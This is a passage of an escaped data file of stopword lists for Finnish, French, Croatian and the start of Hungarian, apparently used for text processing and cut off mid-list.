    \"tulee\",\n        \"tulemme\",\n        \"tulen\",\n        \"tulet\",\n        \"tulette\",\n        \"tulevat\",\n        \"tulimme\",\n        \"tulin\",\n        \"tulisi\",\n        \"tulisimme\",\n        \"tulisin\",\n        \"tulisit\",\n        \"tulisitte\",\n        \"tulisivat\",\n        \"tulit\",\n        \"tulitte\",\n        \"tulivat\",\n        \"tulla\",\n        \"tulleet\",\n        \"tullut\",\n        \"tuntuu\",\n        \"tuo\",\n        \"tuolla\",\n        \"tuolloin\",\n        \"tuolta\",\n        \"tuonne\",\n        \"tuskin\",\n        \"tykö\",\n        \"tähän\",\n        \"tällä\",\n        \"tällöin\",\n        \"tämä\",\n        \"tämän\",\n        \"tänne\",\n        \"tänä\",\n        \"tänään\",\n        \"tässä\",\n        \"tästä\",\n        \"täten\",\n        \"tätä\",\n        \"täysin\",\n        \"täytyvät\",\n        \"täytyy\",\n        \"täällä\",\n        \"täältä\",\n        \"ulkopuolella\",\n        \"usea\",\n        \"useasti\",\n        \"useimmiten\",\n        \"usein\",\n        \"useita\",\n        \"uudeksi\",\n        \"uudelleen\",\n        \"uuden\",\n        \"uudet\",\n        \"uusi\",\n        \"uusia\",\n        \"uusien\",\n        \"uusinta\",\n        \"uuteen\",\n        \"uutta\",\n        \"vaan\",\n        \"vahemmän\",\n        \"vai\",\n        \"vaiheessa\",\n        \"vaikea\",\n        \"vaikean\",\n        \"vaikeat\",\n        \"vaikeilla\",\n        \"vaikeille\",\n        \"vaikeilta\",\n        \"vaikeissa\",\n        \"vaikeista\",\n        \"vaikka\",\n        \"vain\",\n        \"varmasti\",\n        \"varsin\",\n        \"varsinkin\",\n        \"varten\",\n        \"vasen\",\n        \"vasenmalla\",\n        \"vasta\",\n        \"vastaan\",\n        \"vastakkain\",\n        \"vastan\",\n        \"verran\",\n        \"vielä\",\n        \"vierekkäin\",\n        \"vieressä\",\n        \"vieri\",\n        \"viiden\",\n        \"viime\",\n        \"viimeinen\",\n        
\"viimeisen\",\n        \"viimeksi\",\n        \"viisi\",\n        \"voi\",\n        \"voidaan\",\n        \"voimme\",\n        \"voin\",\n        \"voisi\",\n        \"voit\",\n        \"voitte\",\n        \"voivat\",\n        \"vuoden\",\n        \"vuoksi\",\n        \"vuosi\",\n        \"vuosien\",\n        \"vuosina\",\n        \"vuotta\",\n        \"vähemmän\",\n        \"vähintään\",\n        \"vähiten\",\n        \"vähän\",\n        \"välillä\",\n        \"yhdeksän\",\n        \"yhden\",\n        \"yhdessä\",\n        \"yhteen\",\n        \"yhteensä\",\n        \"yhteydessä\",\n        \"yhteyteen\",\n        \"yhtä\",\n        \"yhtäälle\",\n        \"yhtäällä\",\n        \"yhtäältä\",\n        \"yhtään\",\n        \"yhä\",\n        \"yksi\",\n        \"yksin\",\n        \"yksittäin\",\n        \"yleensä\",\n        \"ylemmäs\",\n        \"yli\",\n        \"ylös\",\n        \"ympäri\",\n        \"älköön\",\n        \"älä\",\n    ],\n    \"fr\": [\n        \"a\",\n        \"abord\",\n        \"absolument\",\n        \"afin\",\n        \"ah\",\n        \"ai\",\n        \"aie\",\n        \"ailleurs\",\n        \"ainsi\",\n        \"ait\",\n        \"allaient\",\n        \"allo\",\n        \"allons\",\n        \"allô\",\n        \"alors\",\n        \"anterieur\",\n        \"anterieure\",\n        \"anterieures\",\n        \"apres\",\n        \"après\",\n        \"as\",\n        \"assez\",\n        \"attendu\",\n        \"au\",\n        \"aucun\",\n        \"aucune\",\n        \"aujourd\",\n        \"aujourd'hui\",\n        \"aupres\",\n        \"auquel\",\n        \"aura\",\n        \"auraient\",\n        \"aurait\",\n        \"auront\",\n        \"aussi\",\n        \"autre\",\n        \"autrefois\",\n        \"autrement\",\n        \"autres\",\n        \"autrui\",\n        \"aux\",\n        \"auxquelles\",\n        \"auxquels\",\n        \"avaient\",\n        \"avais\",\n        \"avait\",\n        \"avant\",\n        \"avec\",\n        \"avoir\",\n        
\"avons\",\n        \"ayant\",\n        \"b\",\n        \"bah\",\n        \"bas\",\n        \"basee\",\n        \"bat\",\n        \"beau\",\n        \"beaucoup\",\n        \"bien\",\n        \"bigre\",\n        \"boum\",\n        \"bravo\",\n        \"brrr\",\n        \"c\",\n        \"car\",\n        \"ce\",\n        \"ceci\",\n        \"cela\",\n        \"celle\",\n        \"celle-ci\",\n        \"celle-là\",\n        \"celles\",\n        \"celles-ci\",\n        \"celles-là\",\n        \"celui\",\n        \"celui-ci\",\n        \"celui-là\",\n        \"cent\",\n        \"cependant\",\n        \"certain\",\n        \"certaine\",\n        \"certaines\",\n        \"certains\",\n        \"certes\",\n        \"ces\",\n        \"cet\",\n        \"cette\",\n        \"ceux\",\n        \"ceux-ci\",\n        \"ceux-là\",\n        \"chacun\",\n        \"chacune\",\n        \"chaque\",\n        \"cher\",\n        \"chers\",\n        \"chez\",\n        \"chiche\",\n        \"chut\",\n        \"chère\",\n        \"chères\",\n        \"ci\",\n        \"cinq\",\n        \"cinquantaine\",\n        \"cinquante\",\n        \"cinquantième\",\n        \"cinquième\",\n        \"clac\",\n        \"clic\",\n        \"combien\",\n        \"comme\",\n        \"comment\",\n        \"comparable\",\n        \"comparables\",\n        \"compris\",\n        \"concernant\",\n        \"contre\",\n        \"couic\",\n        \"crac\",\n        \"d\",\n        \"da\",\n        \"dans\",\n        \"de\",\n        \"debout\",\n        \"dedans\",\n        \"dehors\",\n        \"deja\",\n        \"delà\",\n        \"depuis\",\n        \"dernier\",\n        \"derniere\",\n        \"derriere\",\n        \"derrière\",\n        \"des\",\n        \"desormais\",\n        \"desquelles\",\n        \"desquels\",\n        \"dessous\",\n        \"dessus\",\n        \"deux\",\n        \"deuxième\",\n        \"deuxièmement\",\n        \"devant\",\n        \"devers\",\n        \"devra\",\n        \"different\",\n   
     \"differentes\",\n        \"differents\",\n        \"différent\",\n        \"différente\",\n        \"différentes\",\n        \"différents\",\n        \"dire\",\n        \"directe\",\n        \"directement\",\n        \"dit\",\n        \"dite\",\n        \"dits\",\n        \"divers\",\n        \"diverse\",\n        \"diverses\",\n        \"dix\",\n        \"dix-huit\",\n        \"dix-neuf\",\n        \"dix-sept\",\n        \"dixième\",\n        \"doit\",\n        \"doivent\",\n        \"donc\",\n        \"dont\",\n        \"douze\",\n        \"douzième\",\n        \"dring\",\n        \"du\",\n        \"duquel\",\n        \"durant\",\n        \"dès\",\n        \"désormais\",\n        \"e\",\n        \"effet\",\n        \"egale\",\n        \"egalement\",\n        \"egales\",\n        \"eh\",\n        \"elle\",\n        \"elle-même\",\n        \"elles\",\n        \"elles-mêmes\",\n        \"en\",\n        \"encore\",\n        \"enfin\",\n        \"entre\",\n        \"envers\",\n        \"environ\",\n        \"es\",\n        \"est\",\n        \"et\",\n        \"etant\",\n        \"etc\",\n        \"etre\",\n        \"eu\",\n        \"euh\",\n        \"eux\",\n        \"eux-mêmes\",\n        \"exactement\",\n        \"excepté\",\n        \"extenso\",\n        \"exterieur\",\n        \"f\",\n        \"fais\",\n        \"faisaient\",\n        \"faisant\",\n        \"fait\",\n        \"façon\",\n        \"feront\",\n        \"fi\",\n        \"flac\",\n        \"floc\",\n        \"font\",\n        \"g\",\n        \"gens\",\n        \"h\",\n        \"ha\",\n        \"hein\",\n        \"hem\",\n        \"hep\",\n        \"hi\",\n        \"ho\",\n        \"holà\",\n        \"hop\",\n        \"hormis\",\n        \"hors\",\n        \"hou\",\n        \"houp\",\n        \"hue\",\n        \"hui\",\n        \"huit\",\n        \"huitième\",\n        \"hum\",\n        \"hurrah\",\n        \"hé\",\n        \"hélas\",\n        \"i\",\n        \"il\",\n        \"ils\",\n        
\"importe\",\n        \"j\",\n        \"je\",\n        \"jusqu\",\n        \"jusque\",\n        \"juste\",\n        \"k\",\n        \"l\",\n        \"la\",\n        \"laisser\",\n        \"laquelle\",\n        \"las\",\n        \"le\",\n        \"lequel\",\n        \"les\",\n        \"lesquelles\",\n        \"lesquels\",\n        \"leur\",\n        \"leurs\",\n        \"longtemps\",\n        \"lors\",\n        \"lorsque\",\n        \"lui\",\n        \"lui-meme\",\n        \"lui-même\",\n        \"là\",\n        \"lès\",\n        \"m\",\n        \"ma\",\n        \"maint\",\n        \"maintenant\",\n        \"mais\",\n        \"malgre\",\n        \"malgré\",\n        \"maximale\",\n        \"me\",\n        \"meme\",\n        \"memes\",\n        \"merci\",\n        \"mes\",\n        \"mien\",\n        \"mienne\",\n        \"miennes\",\n        \"miens\",\n        \"mille\",\n        \"mince\",\n        \"minimale\",\n        \"moi\",\n        \"moi-meme\",\n        \"moi-même\",\n        \"moindres\",\n        \"moins\",\n        \"mon\",\n        \"moyennant\",\n        \"multiple\",\n        \"multiples\",\n        \"même\",\n        \"mêmes\",\n        \"n\",\n        \"na\",\n        \"naturel\",\n        \"naturelle\",\n        \"naturelles\",\n        \"ne\",\n        \"neanmoins\",\n        \"necessaire\",\n        \"necessairement\",\n        \"neuf\",\n        \"neuvième\",\n        \"ni\",\n        \"nombreuses\",\n        \"nombreux\",\n        \"non\",\n        \"nos\",\n        \"notamment\",\n        \"notre\",\n        \"nous\",\n        \"nous-mêmes\",\n        \"nouveau\",\n        \"nul\",\n        \"néanmoins\",\n        \"nôtre\",\n        \"nôtres\",\n        \"o\",\n        \"oh\",\n        \"ohé\",\n        \"ollé\",\n        \"olé\",\n        \"on\",\n        \"ont\",\n        \"onze\",\n        \"onzième\",\n        \"ore\",\n        \"ou\",\n        \"ouf\",\n        \"ouias\",\n        \"oust\",\n        \"ouste\",\n        \"outre\",\n      
  \"ouvert\",\n        \"ouverte\",\n        \"ouverts\",\n        \"o|\",\n        \"où\",\n        \"p\",\n        \"paf\",\n        \"pan\",\n        \"par\",\n        \"parce\",\n        \"parfois\",\n        \"parle\",\n        \"parlent\",\n        \"parler\",\n        \"parmi\",\n        \"parseme\",\n        \"partant\",\n        \"particulier\",\n        \"particulière\",\n        \"particulièrement\",\n        \"pas\",\n        \"passé\",\n        \"pendant\",\n        \"pense\",\n        \"permet\",\n        \"personne\",\n        \"peu\",\n        \"peut\",\n        \"peuvent\",\n        \"peux\",\n        \"pff\",\n        \"pfft\",\n        \"pfut\",\n        \"pif\",\n        \"pire\",\n        \"plein\",\n        \"plouf\",\n        \"plus\",\n        \"plusieurs\",\n        \"plutôt\",\n        \"possessif\",\n        \"possessifs\",\n        \"possible\",\n        \"possibles\",\n        \"pouah\",\n        \"pour\",\n        \"pourquoi\",\n        \"pourrais\",\n        \"pourrait\",\n        \"pouvait\",\n        \"prealable\",\n        \"precisement\",\n        \"premier\",\n        \"première\",\n        \"premièrement\",\n        \"pres\",\n        \"probable\",\n        \"probante\",\n        \"procedant\",\n        \"proche\",\n        \"près\",\n        \"psitt\",\n        \"pu\",\n        \"puis\",\n        \"puisque\",\n        \"pur\",\n        \"pure\",\n        \"q\",\n        \"qu\",\n        \"quand\",\n        \"quant\",\n        \"quant-à-soi\",\n        \"quanta\",\n        \"quarante\",\n        \"quatorze\",\n        \"quatre\",\n        \"quatre-vingt\",\n        \"quatrième\",\n        \"quatrièmement\",\n        \"que\",\n        \"quel\",\n        \"quelconque\",\n        \"quelle\",\n        \"quelles\",\n        \"quelqu'un\",\n        \"quelque\",\n        \"quelques\",\n        \"quels\",\n        \"qui\",\n        \"quiconque\",\n        \"quinze\",\n        \"quoi\",\n        \"quoique\",\n        \"r\",\n        
\"rare\",\n        \"rarement\",\n        \"rares\",\n        \"relative\",\n        \"relativement\",\n        \"remarquable\",\n        \"rend\",\n        \"rendre\",\n        \"restant\",\n        \"reste\",\n        \"restent\",\n        \"restrictif\",\n        \"retour\",\n        \"revoici\",\n        \"revoilà\",\n        \"rien\",\n        \"s\",\n        \"sa\",\n        \"sacrebleu\",\n        \"sait\",\n        \"sans\",\n        \"sapristi\",\n        \"sauf\",\n        \"se\",\n        \"sein\",\n        \"seize\",\n        \"selon\",\n        \"semblable\",\n        \"semblaient\",\n        \"semble\",\n        \"semblent\",\n        \"sent\",\n        \"sept\",\n        \"septième\",\n        \"sera\",\n        \"seraient\",\n        \"serait\",\n        \"seront\",\n        \"ses\",\n        \"seul\",\n        \"seule\",\n        \"seulement\",\n        \"si\",\n        \"sien\",\n        \"sienne\",\n        \"siennes\",\n        \"siens\",\n        \"sinon\",\n        \"six\",\n        \"sixième\",\n        \"soi\",\n        \"soi-même\",\n        \"soit\",\n        \"soixante\",\n        \"son\",\n        \"sont\",\n        \"sous\",\n        \"souvent\",\n        \"specifique\",\n        \"specifiques\",\n        \"speculatif\",\n        \"stop\",\n        \"strictement\",\n        \"subtiles\",\n        \"suffisant\",\n        \"suffisante\",\n        \"suffit\",\n        \"suis\",\n        \"suit\",\n        \"suivant\",\n        \"suivante\",\n        \"suivantes\",\n        \"suivants\",\n        \"suivre\",\n        \"superpose\",\n        \"sur\",\n        \"surtout\",\n        \"t\",\n        \"ta\",\n        \"tac\",\n        \"tant\",\n        \"tardive\",\n        \"te\",\n        \"tel\",\n        \"telle\",\n        \"tellement\",\n        \"telles\",\n        \"tels\",\n        \"tenant\",\n        \"tend\",\n        \"tenir\",\n        \"tente\",\n        \"tes\",\n        \"tic\",\n        \"tien\",\n        \"tienne\",\n        
\"tiennes\",\n        \"tiens\",\n        \"toc\",\n        \"toi\",\n        \"toi-même\",\n        \"ton\",\n        \"touchant\",\n        \"toujours\",\n        \"tous\",\n        \"tout\",\n        \"toute\",\n        \"toutefois\",\n        \"toutes\",\n        \"treize\",\n        \"trente\",\n        \"tres\",\n        \"trois\",\n        \"troisième\",\n        \"troisièmement\",\n        \"trop\",\n        \"très\",\n        \"tsoin\",\n        \"tsouin\",\n        \"tu\",\n        \"té\",\n        \"u\",\n        \"un\",\n        \"une\",\n        \"unes\",\n        \"uniformement\",\n        \"unique\",\n        \"uniques\",\n        \"uns\",\n        \"v\",\n        \"va\",\n        \"vais\",\n        \"vas\",\n        \"vers\",\n        \"via\",\n        \"vif\",\n        \"vifs\",\n        \"vingt\",\n        \"vivat\",\n        \"vive\",\n        \"vives\",\n        \"vlan\",\n        \"voici\",\n        \"voilà\",\n        \"vont\",\n        \"vos\",\n        \"votre\",\n        \"vous\",\n        \"vous-mêmes\",\n        \"vu\",\n        \"vé\",\n        \"vôtre\",\n        \"vôtres\",\n        \"w\",\n        \"x\",\n        \"y\",\n        \"z\",\n        \"zut\",\n        \"à\",\n        \"â\",\n        \"ça\",\n        \"ès\",\n        \"étaient\",\n        \"étais\",\n        \"était\",\n        \"étant\",\n        \"été\",\n        \"être\",\n        \"ô\",\n    ],\n    \"hr\": [\n        \"a\",\n        \"ako\",\n        \"ali\",\n        \"bi\",\n        \"bih\",\n        \"bila\",\n        \"bili\",\n        \"bilo\",\n        \"bio\",\n        \"bismo\",\n        \"biste\",\n        \"biti\",\n        \"bumo\",\n        \"da\",\n        \"do\",\n        \"duž\",\n        \"ga\",\n        \"hoće\",\n        \"hoćemo\",\n        \"hoćete\",\n        \"hoćeš\",\n        \"hoću\",\n        \"i\",\n        \"iako\",\n        \"ih\",\n        \"ili\",\n        \"iz\",\n        \"ja\",\n        \"je\",\n        \"jedna\",\n        \"jedne\",\n  
      \"jedno\",\n        \"jer\",\n        \"jesam\",\n        \"jesi\",\n        \"jesmo\",\n        \"jest\",\n        \"jeste\",\n        \"jesu\",\n        \"jim\",\n        \"joj\",\n        \"još\",\n        \"ju\",\n        \"kada\",\n        \"kako\",\n        \"kao\",\n        \"koja\",\n        \"koje\",\n        \"koji\",\n        \"kojima\",\n        \"koju\",\n        \"kroz\",\n        \"li\",\n        \"me\",\n        \"mene\",\n        \"meni\",\n        \"mi\",\n        \"mimo\",\n        \"moj\",\n        \"moja\",\n        \"moje\",\n        \"mu\",\n        \"na\",\n        \"nad\",\n        \"nakon\",\n        \"nam\",\n        \"nama\",\n        \"nas\",\n        \"naš\",\n        \"naša\",\n        \"naše\",\n        \"našeg\",\n        \"ne\",\n        \"nego\",\n        \"neka\",\n        \"neki\",\n        \"nekog\",\n        \"neku\",\n        \"nema\",\n        \"netko\",\n        \"neće\",\n        \"nećemo\",\n        \"nećete\",\n        \"nećeš\",\n        \"neću\",\n        \"nešto\",\n        \"ni\",\n        \"nije\",\n        \"nikoga\",\n        \"nikoje\",\n        \"nikoju\",\n        \"nisam\",\n        \"nisi\",\n        \"nismo\",\n        \"niste\",\n        \"nisu\",\n        \"njega\",\n        \"njegov\",\n        \"njegova\",\n        \"njegovo\",\n        \"njemu\",\n        \"njezin\",\n        \"njezina\",\n        \"njezino\",\n        \"njih\",\n        \"njihov\",\n        \"njihova\",\n        \"njihovo\",\n        \"njim\",\n        \"njima\",\n        \"njoj\",\n        \"nju\",\n        \"no\",\n        \"o\",\n        \"od\",\n        \"odmah\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ova\",\n        \"pa\",\n        \"pak\",\n        \"po\",\n        \"pod\",\n        \"pored\",\n        \"prije\",\n        \"s\",\n        \"sa\",\n        \"sam\",\n        \"samo\",\n        \"se\",\n        \"sebe\",\n        \"sebi\",\n        \"si\",\n        \"smo\",\n        
\"ste\",\n        \"su\",\n        \"sve\",\n        \"svi\",\n        \"svog\",\n        \"svoj\",\n        \"svoja\",\n        \"svoje\",\n        \"svom\",\n        \"ta\",\n        \"tada\",\n        \"taj\",\n        \"tako\",\n        \"te\",\n        \"tebe\",\n        \"tebi\",\n        \"ti\",\n        \"to\",\n        \"toj\",\n        \"tome\",\n        \"tu\",\n        \"tvoj\",\n        \"tvoja\",\n        \"tvoje\",\n        \"u\",\n        \"uz\",\n        \"vam\",\n        \"vama\",\n        \"vas\",\n        \"vaš\",\n        \"vaša\",\n        \"vaše\",\n        \"već\",\n        \"vi\",\n        \"vrlo\",\n        \"za\",\n        \"zar\",\n        \"će\",\n        \"ćemo\",\n        \"ćete\",\n        \"ćeš\",\n        \"ću\",\n        \"što\",\n    ],\n    \"hu\": [\n        \"a\",\n        \"abba\",\n        \"abban\",\n        \"abból\",\n        \"addig\",\n        \"ahhoz\",\n        \"ahogy\",\n        \"ahol\",\n        \"aki\",\n        \"akik\",\n        \"akkor\",\n        \"akár\",\n        \"alapján\",\n        \"alatt\",\n        \"alatta\",\n        \"alattad\",\n        \"alattam\",\n        \"alattatok\",\n        \"alattuk\",\n        \"alattunk\",\n        \"alá\",\n        \"alád\",\n        \"alájuk\",\n        \"alám\",\n        \"alánk\",\n        \"alátok\",\n        \"alól\",\n        \"alóla\",\n        \"alólad\",\n        \"alólam\",\n        \"alólatok\",\n        \"alóluk\",\n        \"alólunk\",\n        \"amely\",\n        \"amelybol\",\n        \"amelyek\",\n        \"amelyekben\",\n        \"amelyeket\",\n        \"amelyet\",\n        \"amelyik\",\n        \"amelynek\",\n        \"ami\",\n        \"amikor\",\n        \"amit\",\n        \"amolyan\",\n        \"amott\",\n        \"amíg\",\n        \"annak\",\n        \"annál\",\n        \"arra\",\n        \"arról\",\n        \"attól\",\n        \"az\",\n        \"aznap\",\n        \"azok\",\n        \"azokat\",\n        \"azokba\",\n        \"azokban\",\n        
\"azokból\",\n        \"azokhoz\",\n        \"azokig\",\n        \"azokkal\",\n        \"azokká\",\n        \"azoknak\",\n        \"azoknál\",\n        \"azokon\",\n        \"azokra\",\n        \"azokról\",\n        \"azoktól\",\n        \"azokért\",\n        \"azon\",\n        \"azonban\",\n        \"azonnal\",\n        \"azt\",\n        \"aztán\",\n        \"azután\",\n        \"azzal\",\n        \"azzá\",\n        \"azért\",\n        \"bal\",\n        \"balra\",\n        \"ban\",\n        \"be\",\n        \"belé\",\n        \"beléd\",\n        \"beléjük\",\n        \"belém\",\n        \"belénk\",\n        \"belétek\",\n        \"belül\",\n        \"belőle\",\n        \"belőled\",\n        \"belőlem\",\n        \"belőletek\",\n        \"belőlük\",\n        \"belőlünk\",\n        \"ben\",\n        \"benne\",\n        \"benned\",\n        \"bennem\",\n        \"bennetek\",\n        \"bennük\",\n        \"bennünk\",\n        \"bár\",\n        \"bárcsak\",\n        \"bármilyen\",\n        \"búcsú\",\n        \"cikk\",\n        \"cikkek\",\n        \"cikkeket\",\n        \"csak\",\n        \"csakhogy\",\n        \"csupán\",\n        \"de\",\n        \"dehogy\",\n        \"e\",\n        \"ebbe\",\n        \"ebben\",\n        \"ebből\",\n        \"eddig\",\n        \"egy\",\n        \"egyebek\",\n        \"egyebet\",\n        \"egyedül\",\n        \"egyelőre\",\n        \"egyes\",\n        \"egyet\",\n        \"egyetlen\",\n        \"egyik\",\n        \"egymás\",\n        \"egyre\",\n        \"egyszerre\",\n        \"egyéb\",\n        \"együtt\",\n        \"egész\",\n        \"egészen\",\n        \"ehhez\",\n        \"ekkor\",\n        \"el\",\n        \"eleinte\",\n        \"ellen\",\n        \"ellenes\",\n        \"elleni\",\n        \"ellenére\",\n        \"elmondta\",\n        \"első\",\n        \"elsők\",\n        \"elsősorban\",\n        \"elsőt\",\n        \"elé\",\n        \"eléd\",\n        \"elég\",\n        \"eléjük\",\n        \"elém\",\n        \"elénk\",\n 
       \"elétek\",\n        \"elő\",\n        \"előbb\",\n        \"elől\",\n        \"előle\",\n        \"előled\",\n        \"előlem\",\n        \"előletek\",\n        \"előlük\",\n        \"előlünk\",\n        \"először\",\n        \"előtt\",\n        \"előtte\",\n        \"előtted\",\n        \"előttem\",\n        \"előttetek\",\n        \"előttük\",\n        \"előttünk\",\n        \"előző\",\n        \"emilyen\",\n        \"engem\",\n        \"ennek\",\n        \"ennyi\",\n        \"ennél\",\n        \"enyém\",\n        \"erre\",\n        \"erről\",\n        \"esetben\",\n        \"ettől\",\n        \"ez\",\n        \"ezek\",\n        \"ezekbe\",\n        \"ezekben\",\n        \"ezekből\",\n        \"ezeken\",\n        \"ezeket\",\n        \"ezekhez\",\n        \"ezekig\",\n        \"ezekkel\",\n        \"ezekké\",\n        \"ezeknek\",\n        \"ezeknél\",\n        \"ezekre\",\n        \"ezekről\",\n        \"ezektől\",\n        \"ezekért\",\n        \"ezen\",\n        \"ezentúl\",\n        \"ezer\",\n        \"ezret\",\n        \"ezt\",\n        \"ezután\",\n        \"ezzel\",\n        \"ezzé\",\n        \"ezért\",\n        \"fel\",\n        \"fele\",\n        \"felek\",\n        \"felet\",\n        \"felett\",\n        \"felé\",\n        \"fent\",\n        \"fenti\",\n        \"fél\",\n        \"fölé\",\n        \"gyakran\",\n        \"ha\",\n        \"halló\",\n        \"hamar\",\n        \"hanem\",\n        \"harmadik\",\n        \"harmadikat\",\n        \"harminc\",\n        \"hat\",\n        \"hatodik\",\n        \"hatodikat\",\n        \"hatot\",\n        \"hatvan\",\n        \"helyett\",\n        \"hetedik\",\n        \"hetediket\",\n        \"hetet\",\n        \"hetven\",\n        \"hirtelen\",\n        \"hiszen\",\n        \"hiába\",\n        \"hogy\",\n        \"hogyan\",\n        \"hol\",\n        \"holnap\",\n        \"holnapot\",\n        \"honnan\",\n        \"hova\",\n        \"hozzá\",\n        \"hozzád\",\n        \"hozzájuk\",\n        
\"hozzám\",\n        \"hozzánk\",\n        \"hozzátok\",\n        \"hurrá\",\n        \"huszadik\",\n        \"hány\",\n        \"hányszor\",\n        \"hármat\",\n        \"három\",\n        \"hát\",\n        \"hátha\",\n        \"hátulsó\",\n        \"hét\",\n        \"húsz\",\n        \"ide\",\n        \"ide-оda\",\n        \"idén\",\n        \"igazán\",\n        \"igen\",\n        \"ill\",\n        \"illetve\",\n        \"ilyen\",\n        \"ilyenkor\",\n        \"immár\",\n        \"inkább\",\n        \"is\",\n        \"ismét\",\n        \"ison\",\n        \"itt\",\n        \"jelenleg\",\n        \"jobban\",\n        \"jobbra\",\n        \"jó\",\n        \"jól\",\n        \"jólesik\",\n        \"jóval\",\n        \"jövőre\",\n        \"kell\",\n        \"kellene\",\n        \"kellett\",\n        \"kelljen\",\n        \"keressünk\",\n        \"keresztül\",\n        \"ketten\",\n        \"kettő\",\n        \"kettőt\",\n        \"kevés\",\n        \"ki\",\n        \"kiben\",\n        \"kiből\",\n        \"kicsit\",\n        \"kicsoda\",\n        \"kihez\",\n        \"kik\",\n        \"kikbe\",\n        \"kikben\",\n        \"kikből\",\n        \"kiken\",\n        \"kiket\",\n        \"kikhez\",\n        \"kikkel\",\n        \"kikké\",\n        \"kiknek\",\n        \"kiknél\",\n        \"kikre\",\n        \"kikről\",\n        \"kiktől\",\n        \"kikért\",\n        \"kilenc\",\n        \"kilencedik\",\n        \"kilencediket\",\n        \"kilencet\",\n        \"kilencven\",\n        \"kin\",\n        \"kinek\",\n        \"kinél\",\n        \"kire\",\n        \"kiről\",\n        \"kit\",\n        \"kitől\",\n        \"kivel\",\n        \"kivé\",\n        \"kié\",\n        \"kiért\",\n        \"korábban\",\n        \"képest\",\n        \"kérem\",\n        \"kérlek\",\n        \"kész\",\n        \"késő\",\n        \"később\",\n        \"későn\",\n        \"két\",\n        \"kétszer\",\n        \"kívül\",\n        \"körül\",\n        \"köszönhetően\",\n        
\"köszönöm\",\n        \"közben\",\n        \"közel\",\n        \"közepesen\",\n        \"közepén\",\n        \"közé\",\n        \"között\",\n        \"közül\",\n        \"külön\",\n        \"különben\",\n        \"különböző\",\n        \"különbözőbb\",\n        \"különbözőek\",\n        \"lassan\",\n        \"le\",\n        \"legalább\",\n        \"legyen\",\n        \"lehet\",\n        \"lehetetlen\",\n        \"lehetett\",\n        \"lehetőleg\",\n        \"lehetőség\",\n        \"lenne\",\n        \"lenni\",\n        \"lennék\",\n        \"lennének\",\n        \"lesz\",\n        \"leszek\",\n        \"lesznek\",\n        \"leszünk\",\n        \"lett\",\n        \"lettek\",\n        \"lettem\",\n        \"lettünk\",\n        \"lévő\",\n        \"ma\",\n        \"maga\",\n        \"magad\",\n        \"magam\",\n        \"magatokat\",\n        \"magukat\",\n        \"magunkat\",\n        \"magát\",\n        \"mai\",\n        \"majd\",\n        \"majdnem\",\n        \"manapság\",\n        \"meg\",\n        \"megcsinál\",\n        \"megcsinálnak\",\n        \"megint\",\n        \"megvan\",\n        \"mellett\",\n        \"mellette\",\n        \"melletted\",\n        \"mellettem\",\n        \"mellettetek\",\n        \"mellettük\",\n        \"mellettünk\",\n        \"mellé\",\n        \"melléd\",\n        \"melléjük\",\n        \"mellém\",\n        \"mellénk\",\n        \"mellétek\",\n        \"mellől\",\n        \"mellőle\",\n        \"mellőled\",\n        \"mellőlem\",\n        \"mellőletek\",\n        \"mellőlük\",\n        \"mellőlünk\",\n        \"mely\",\n        \"melyek\",\n        \"melyik\",\n        \"mennyi\",\n        \"mert\",\n        \"mi\",\n        \"miatt\",\n        \"miatta\",\n        \"miattad\",\n        \"miattam\",\n        \"miattatok\",\n        \"miattuk\",\n        \"miattunk\",\n        \"mibe\",\n        \"miben\",\n        \"miből\",\n        \"mihez\",\n        \"mik\",\n        \"mikbe\",\n        \"mikben\",\n        \"mikből\",\n   
     \"miken\",\n        \"miket\",\n        \"mikhez\",\n        \"mikkel\",\n        \"mikké\",\n        \"miknek\",\n        \"miknél\",\n        \"mikor\",\n        \"mikre\",\n        \"mikről\",\n        \"miktől\",\n        \"mikért\",\n        \"milyen\",\n        \"min\",\n        \"mind\",\n        \"mindegyik\",\n        \"mindegyiket\",\n        \"minden\",\n        \"mindenesetre\",\n        \"mindenki\",\n        \"mindent\",\n        \"mindenütt\",\n        \"mindig\",\n        \"mindketten\",\n        \"minek\",\n        \"minket\",\n        \"mint\",\n        \"mintha\",\n        \"minél\",\n        \"mire\",\n        \"miről\",\n        \"mit\",\n        \"mitől\",\n        \"mivel\",\n        \"mivé\",\n        \"miért\",\n        \"mondta\",\n        \"most\",\n        \"mostanáig\",\n        \"már\",\n        \"más\",\n        \"másik\",\n        \"másikat\",\n        \"másnap\",\n        \"második\",\n        \"másodszor\",\n        \"mások\",\n        \"másokat\",\n        \"mást\",\n        \"még\",\n        \"mégis\",\n        \"míg\",\n        \"mögé\",\n        \"mögéd\",\n        \"mögéjük\",\n        \"mögém\",\n        \"mögénk\",\n        \"mögétek\",\n        \"mögött\",\n        \"mögötte\",\n        \"mögötted\",\n        \"mögöttem\",\n        \"mögöttetek\",\n        \"mögöttük\",\n        \"mögöttünk\",\n        \"mögül\",\n        \"mögüle\",\n        \"mögüled\",\n        \"mögülem\",\n        \"mögületek\",\n        \"mögülük\",\n        \"mögülünk\",\n        \"múltkor\",\n        \"múlva\",\n        \"na\",\n        \"nagy\",\n        \"nagyobb\",\n        \"nagyon\",\n        \"naponta\",\n        \"napot\",\n        \"ne\",\n        \"negyedik\",\n        \"negyediket\",\n        \"negyven\",\n        \"neked\",\n        \"nekem\",\n        \"neki\",\n        \"nekik\",\n        \"nektek\",\n        \"nekünk\",\n        \"nem\",\n        \"nemcsak\",\n        \"nemrég\",\n        \"nincs\",\n        \"nyolc\",\n        
\"nyolcadik\",\n        \"nyolcadikat\",\n        \"nyolcat\",\n        \"nyolcvan\",\n        \"nála\",\n        \"nálad\",\n        \"nálam\",\n        \"nálatok\",\n        \"náluk\",\n        \"nálunk\",\n        \"négy\",\n        \"négyet\",\n        \"néha\",\n        \"néhány\",\n        \"nélkül\",\n        \"o\",\n        \"oda\",\n        \"ok\",\n        \"olyan\",\n        \"onnan\",\n        \"ott\",\n        \"pedig\",\n        \"persze\",\n        \"pár\",\n        \"például\",\n        \"rajta\",\n        \"rajtad\",\n        \"rajtam\",\n        \"rajtatok\",\n        \"rajtuk\",\n        \"rajtunk\",\n        \"rendben\",\n        \"rosszul\",\n        \"rá\",\n        \"rád\",\n        \"rájuk\",\n        \"rám\",\n        \"ránk\",\n        \"rátok\",\n        \"régen\",\n        \"régóta\",\n        \"részére\",\n        \"róla\",\n        \"rólad\",\n        \"rólam\",\n        \"rólatok\",\n        \"róluk\",\n        \"rólunk\",\n        \"rögtön\",\n        \"s\",\n        \"saját\",\n        